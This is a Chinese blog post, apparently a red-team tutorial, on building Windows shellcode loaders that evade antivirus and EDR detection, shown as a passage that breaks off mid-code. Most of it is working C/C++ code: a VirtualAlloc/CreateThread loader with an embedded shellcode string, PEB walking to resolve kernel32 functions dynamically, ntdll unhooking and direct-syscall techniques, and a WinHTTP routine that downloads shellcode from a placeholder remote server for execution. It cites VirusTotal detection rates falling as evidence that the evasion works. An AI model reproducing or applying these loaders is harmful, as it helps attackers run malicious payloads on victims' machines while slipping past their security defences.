<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Windows,shellcode,后渗透," />










<meta property="og:type" content="article">
<meta property="og:title" content="Shellcode加载器">
<meta property="og:url" content="http://example.com/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/index.html">
<meta property="og:site_name" content="玄天机">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ad05nemy.github.io/2019/04/12/shellcode-6/zhaiyao.jpeg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/edrhook.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/edrdll.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/vt1.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/vt2.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/ntll.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/ntdll.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/syscall.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/syscallout.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/vt3.jpg">
<meta property="og:image" content="http://example.com/photo/shellcodeloader/vt4.jpg">
<meta property="article:published_time" content="2021-12-29T02:42:01.000Z">
<meta property="article:modified_time" content="2021-12-29T09:20:29.437Z">
<meta property="article:author" content="SkyXuan">
<meta property="article:tag" content="Windows">
<meta property="article:tag" content="shellcode">
<meta property="article:tag" content="后渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ad05nemy.github.io/2019/04/12/shellcode-6/zhaiyao.jpeg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/12/29/Shellcode加载器/"/>





  <title>Shellcode加载器 | 玄天机</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">玄天机</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-主页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            主页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于我">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/test.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="玄天机">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Shellcode加载器</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-12-29T10:42:01+08:00">
                2021-12-29
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <img src="https://ad05nemy.github.io/2019/04/12/shellcode-6/zhaiyao.jpeg" width="100%">
<span id="more"></span>

<h4 id="ShellCode加载"><a href="#ShellCode加载" class="headerlink" title="ShellCode加载"></a>ShellCode加载</h4><p>目前杀软一般通过行为特征，字符串等进行动态查杀shellcode，EDR则会通过HOOK系统函数来判断恶意程序，这是EDR和AV核心不同的点。</p>
<p><strong>EDRhook函数是在用户态(ring3)，方式是劫持/修改系统dll函数定义，如(kernel32.dll)，通过在函数开头插入jmp指令，跳转到EDR得判断函数来进行监测</strong><br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/edrhook.jpg" alt="edrhook"><br><strong>还有一种方式是通过在系统加载的程序之后插入EDR本身进行监测的dll，这样程序加载如(GetProcessHandle)等函数即可被检测到</strong><br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/edrdll.jpg" alt="edrhook"></p>
<p>例:一个简单的线程加载shellcode</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">##include &lt;Windows.h&gt;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">const</span> <span class="keyword">char</span> shellcode[] = <span class="string">&quot;\xfc\xe8\x82 (...) &quot;</span>;</span><br><span class="line">	PVOID shellcode_exec = VirtualAlloc(<span class="number">0</span>, sizeof shellcode, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);</span><br><span class="line">	memcpy(shellcode_exec, shellcode, sizeof shellcode);</span><br><span class="line">	DWORD threadID;</span><br><span class="line">	HANDLE hThread = CreateThread(NULL, <span class="number">0</span>, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, <span class="number">0</span>, &amp;threadID);</span><br><span class="line">	WaitForSingleObject(hThread, INFINITE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译之后在VT查杀一下<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/vt1.jpg" alt="edrhook"><br>26/67的查杀率很高，因为我们是原生的函数</p>
<h4 id="动态加载函数"><a href="#动态加载函数" class="headerlink" title="动态加载函数"></a>动态加载函数</h4><p>加载shellcode用的<strong>VirtualAlloc</strong>以及<strong>CreateThread</strong>等函数，基本存在于一个系统dll<strong>kernel32.dll</strong>中，动态加载kernel32.dll，利用PEB/TEB结构即可遍历到kernelbase的地址</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">_declspec(naked) <span class="function">DWORD <span class="title">getKernel32</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	_asm</span><br><span class="line">	&#123;</span><br><span class="line">		mov eax, fs:[030h]</span><br><span class="line">		mov eax, [eax+0ch]</span><br><span class="line">		mov eax, [eax+14h]</span><br><span class="line">		mov eax, [eax]</span><br><span class="line">		mov eax, [eax]</span><br><span class="line">		mov eax, [eax+10h]</span><br><span class="line">		ret</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>注意:内联汇编只能用于x86架构</strong><br>使用C++亦可</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">PPEB pPEB = (PPEB)__readgsqword(<span class="number">0x60</span>);</span><br><span class="line">PPEB_LDR_DATA pLoaderData = pPEB-&gt;Ldr;</span><br><span class="line">PLIST_ENTRY listHead = &amp;pLoaderData-&gt;InMemoryOrderModuleList;</span><br><span class="line">PLIST_ENTRY listCurrent = listHead-&gt;Flink;</span><br><span class="line">PVOID kernel32Address;</span><br><span class="line">PVOID pvDllMemory = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">do</span></span><br><span class="line">&#123;</span><br><span class="line">	PLDR_DATA_TABLE_ENTRY dllEntry = CONTAINING_RECORD(listCurrent, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);</span><br><span class="line">	DWORD dllNameLength = WideCharToMultiByte(CP_ACP, <span class="number">0</span>, dllEntry-&gt;FullDllName.Buffer, dllEntry-&gt;FullDllName.Length, NULL, <span class="number">0</span>, NULL, NULL);</span><br><span class="line">	PCHAR dllName = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllNameLength);</span><br><span class="line">	WideCharToMultiByte(CP_ACP, <span class="number">0</span>, dllEntry-&gt;FullDllName.Buffer, dllEntry-&gt;FullDllName.Length, dllName, dllNameLength, NULL, NULL);</span><br><span class="line">	CharUpperA(dllName);</span><br><span class="line">	<span class="keyword">if</span> (strstr(dllName, <span class="string">&quot;KERNEL32.DLL&quot;</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		kernel32Address = dllEntry-&gt;DllBase;</span><br><span class="line">		HeapFree(GetProcessHeap(), <span class="number">0</span>, dllName);</span><br><span class="line">		<span class="keyword">break</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	HeapFree(GetProcessHeap(), <span class="number">0</span>, dllName);</span><br><span class="line">	listCurrent = listCurrent-&gt;Flink;</span><br><span class="line">&#125; <span class="keyword">while</span> (listCurrent != listHead);</span><br></pre></td></tr></table></figure>

<p>通过得到的kernel32.dll地址，利用GetProcAddress即可获取函数地址</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;windows.h&gt;</span><br><span class="line">#include &lt;winternl.h&gt;</span><br><span class="line"></span><br><span class="line"><span class="function">typedef <span class="title">HMODULE</span><span class="params">(WINAPI* PGetModuleHandleA)</span><span class="params">(PCSTR)</span></span>;</span><br><span class="line"><span class="function">typedef <span class="title">FARPROC</span><span class="params">(WINAPI* PGetProcAddress)</span><span class="params">(HMODULE, PCSTR)</span></span>;</span><br><span class="line"><span class="function">typedef <span class="title">LPVOID</span><span class="params">(WINAPI* PVirtualAlloc)</span><span class="params">(LPVOID, SIZE_T, DWORD, DWORD)</span></span>;</span><br><span class="line"><span class="function">typedef <span class="title">HANDLE</span><span class="params">(WINAPI* PCreateThread)</span><span class="params">(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD)</span></span>;</span><br><span class="line"><span class="function">typedef <span class="title">DWORD</span><span class="params">(WINAPI* PWaitForSingleObject)</span><span class="params">(HANDLE, DWORD)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	PPEB pPEB = (PPEB)__readgsqword(<span class="number">0x60</span>);</span><br><span class="line">	PPEB_LDR_DATA pLoaderData = pPEB-&gt;Ldr;</span><br><span class="line">	PLIST_ENTRY listHead = &amp;pLoaderData-&gt;InMemoryOrderModuleList;</span><br><span class="line">	PLIST_ENTRY listCurrent = listHead-&gt;Flink;</span><br><span class="line">	PVOID kernel32Address;</span><br><span class="line">	PVOID pvDllMemory = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">do</span></span><br><span class="line">	&#123;</span><br><span class="line">		PLDR_DATA_TABLE_ENTRY dllEntry = CONTAINING_RECORD(listCurrent, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);</span><br><span class="line">		DWORD dllNameLength = WideCharToMultiByte(CP_ACP, <span class="number">0</span>, dllEntry-&gt;FullDllName.Buffer, dllEntry-&gt;FullDllName.Length, NULL, <span class="number">0</span>, NULL, NULL);</span><br><span class="line">		PCHAR dllName = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllNameLength);</span><br><span class="line">		WideCharToMultiByte(CP_ACP, <span class="number">0</span>, dllEntry-&gt;FullDllName.Buffer, dllEntry-&gt;FullDllName.Length, dllName, dllNameLength, NULL, NULL);</span><br><span class="line">		CharUpperA(dllName);</span><br><span class="line">		<span class="keyword">if</span> (strstr(dllName, <span class="string">&quot;KERNEL32.DLL&quot;</span>))</span><br><span class="line">		&#123;</span><br><span class="line">			kernel32Address = dllEntry-&gt;DllBase;</span><br><span class="line">			HeapFree(GetProcessHeap(), <span class="number">0</span>, dllName);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		HeapFree(GetProcessHeap(), <span class="number">0</span>, dllName);</span><br><span class="line">		listCurrent = listCurrent-&gt;Flink;</span><br><span class="line">	&#125; <span class="keyword">while</span> (listCurrent != listHead);</span><br><span class="line"></span><br><span class="line">	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32Address;</span><br><span class="line">	PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)kernel32Address + pDosHeader-&gt;e_lfanew);</span><br><span class="line">	PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER) &amp; (pNtHeader-&gt;OptionalHeader);</span><br><span class="line">	PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)kernel32Address + pOptionalHeader-&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);</span><br><span class="line">	PULONG pAddressOfFunctions = (PULONG)((PBYTE)kernel32Address + pExportDirectory-&gt;AddressOfFunctions);</span><br><span class="line">	PULONG pAddressOfNames = (PULONG)((PBYTE)kernel32Address + pExportDirectory-&gt;AddressOfNames);</span><br><span class="line">	PUSHORT pAddressOfNameOrdinals = (PUSHORT)((PBYTE)kernel32Address + pExportDirectory-&gt;AddressOfNameOrdinals);</span><br><span class="line"></span><br><span class="line">	PGetModuleHandleA pGetModuleHandleA = NULL;</span><br><span class="line">	PGetProcAddress pGetProcAddress = NULL;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; pExportDirectory-&gt;NumberOfNames; ++i)</span><br><span class="line">	&#123;</span><br><span class="line">		PCSTR pFunctionName = (PSTR)((PBYTE)kernel32Address + pAddressOfNames[i]);</span><br><span class="line">		<span class="keyword">if</span> (!strcmp(pFunctionName, <span class="string">&quot;GetModuleHandleA&quot;</span>))</span><br><span class="line">		&#123;</span><br><span class="line">			pGetModuleHandleA = (PGetModuleHandleA)((PBYTE)kernel32Address + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> (!strcmp(pFunctionName, <span class="string">&quot;GetProcAddress&quot;</span>))</span><br><span class="line">		&#123;</span><br><span class="line">			pGetProcAddress = (PGetProcAddress)((PBYTE)kernel32Address + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	PVirtualAlloc funcVirtualAlloc = (PVirtualAlloc)pGetProcAddress((HMODULE)kernel32Address, <span class="string">&quot;VirtualAlloc&quot;</span>);</span><br><span class="line">	PCreateThread funcCreateThread = (PCreateThread)pGetProcAddress((HMODULE)kernel32Address, <span class="string">&quot;CreateThread&quot;</span>);</span><br><span class="line">	PWaitForSingleObject funcWaitForSingleObject = (PWaitForSingleObject)pGetProcAddress((HMODULE)kernel32Address, <span class="string">&quot;WaitForSingleObject&quot;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">const</span> <span class="keyword">char</span> shellcode[] = <span class="string">&quot;\xfc\x48\....&quot;</span>;</span><br><span class="line">	PVOID shellcode_exec = funcVirtualAlloc(<span class="number">0</span>, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</span><br><span class="line">	memcpy(shellcode_exec, shellcode, sizeof shellcode);</span><br><span class="line">	DWORD threadID;</span><br><span class="line">	HANDLE hThread = funcCreateThread(NULL, <span class="number">0</span>, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, <span class="number">0</span>, &amp;threadID);</span><br><span class="line">	funcWaitForSingleObject(hThread, INFINITE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译测试<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/vt2.jpg" alt="edrhook"><br>减少了将近一半,但这还不够</p>
<h3 id="syscalls"><a href="#syscalls" class="headerlink" title="syscalls"></a>syscalls</h3><p>另一种方式可以更直接的绕过EDR的监测，通俗来讲就是调用更深的函数，WINAPI最后在进入内核时，都调用的是ntdll.dll的函数，因此，绕过kernel32.dll调用ntdll的函数即可绕过一部分监测</p>
<h4 id="SharpUnhooker"><a href="#SharpUnhooker" class="headerlink" title="SharpUnhooker"></a>SharpUnhooker</h4><p><strong>方法原理</strong><br>将 ntdll.dll 的新副本从磁盘映射到进程内存<br>找到被hook的 ntdll.dll 的 .text 部分的虚拟地址<br>查找新映射的 ntdll.dll 的 .text 部分的虚拟地址<br>获取hook模块的 .text 部分的原始内存保护<br>将 .text 部分从新映射的 dll 复制到原始（hook）ntdll.dll 的虚拟地址<br><strong>这样即可覆盖原来劫持了入口点的EDR代码</strong><br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/ntll.jpg" alt="edrhook"><br>这种直接调用ntdll.dll内核函数的方法被称为<strong>Native API</strong><br>so…其实还有更好的办法，首先需要一张图来表示windows 接口调用关系<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/ntdll.jpg" alt="edrhook"><br>在Win32 API之下是Native API (ntdll.dll)，它实际上是用户模式应用程序和底层操作系统之间的真正接口(该API并未公开记录，意义着并无使用文档)</p>
<p>NtWriteFilez在内核中的指令<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/syscall.jpg" alt="edrhook"></p>
<p>意思是可以通过直接调用对应函数内核指令的方式来利用加载，即为syscalls<br>其中涉及到很多的汇编知识，包括调用约定，系统调用号等，即syscall,不同系统的版本，位数，系统调用号也不一致，这样会导致花费大量的时间来在系统中寻找调用号，好在已经有大佬实现了自动工具(<a target="_blank" rel="noopener" href="https://github.com/jthuraisamy/SysWhispers">https://github.com/jthuraisamy/SysWhispers</a>)<br>该工具可自动导出对应系统版本的函数调用约定，将导出的文件加载进项目文件即可使用<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/syscallout.jpg" alt="edrhook"><br>其中VirtualAlloc在ntdll调用的函数应为NtAllocateVirtualMemory，可通过<a target="_blank" rel="noopener" href="http://undocumented.ntinternals.net/%E6%9F%A5%E8%AF%A2%E5%AF%B9%E5%BA%94%E8%B5%84%E6%96%99%E5%8F%8A%E5%87%BD%E6%95%B0%E5%8E%9F%E5%9E%8B">http://undocumented.ntinternals.net/查询对应资料及函数原型</a></p>
<p>代码复杂，相关资料可通过github搜索，编译测试<br><img src="/2021/12/29/Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8/../../../../photo/shellcodeloader/vt3.jpg" alt="edrhook"><br>8/65的检测率已经非常不错了，但这不是我们的最终目的<br>经过反复测试，定位到是因为shellcode是直接写入程序，通过查看内存即可识别，我们可以利用分离加载shellcode绕过</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">LPSTR <span class="title">GetRunCode</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	std::cout &lt;&lt; <span class="string">&quot;GetRunCode\n&quot;</span> &lt;&lt; std::endl;</span><br><span class="line">	DWORD dwSize = <span class="number">0</span>;</span><br><span class="line">	DWORD dwDownloaded = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">char</span>* pszOutBuffer = NULL;</span><br><span class="line">	HINTERNET  hSession = NULL,</span><br><span class="line">		hConnect = NULL,</span><br><span class="line">		hRequest = NULL;</span><br><span class="line">	BOOL  bResults = FALSE;</span><br><span class="line">	hSession = WinHttpOpen(L<span class="string">&quot;User-Agent&quot;</span>, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, <span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span> (hSession)</span><br><span class="line">	&#123;</span><br><span class="line">		hConnect = WinHttpConnect(hSession, L<span class="string">&quot;xxx.xxx.xxx.xxx&quot;</span>, INTERNET_DEFAULT_HTTP_PORT, <span class="number">0</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (hConnect)</span><br><span class="line">	&#123;</span><br><span class="line">		hRequest = WinHttpOpenRequest(hConnect, L<span class="string">&quot;GET&quot;</span>, L<span class="string">&quot;GetRunCode.txt&quot;</span>, L<span class="string">&quot;HTTP/1.1&quot;</span>, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, <span class="number">0</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	LPCWSTR header = L<span class="string">&quot;Content-type: application/x-www-form-urlencoded/r/n&quot;</span>;</span><br><span class="line">	SIZE_T len = lstrlenW(header);</span><br><span class="line">	WinHttpAddRequestHeaders(hRequest, header, DWORD(len), WINHTTP_ADDREQ_FLAG_ADD);</span><br><span class="line">	<span class="keyword">if</span> (hRequest)</span><br><span class="line">	&#123;</span><br><span class="line">		bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, <span class="number">0</span>, WINHTTP_NO_REQUEST_DATA, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">		<span class="comment">////bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (bResults)</span><br><span class="line">	&#123;</span><br><span class="line">		bResults = WinHttpReceiveResponse(hRequest, NULL);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (bResults)</span><br><span 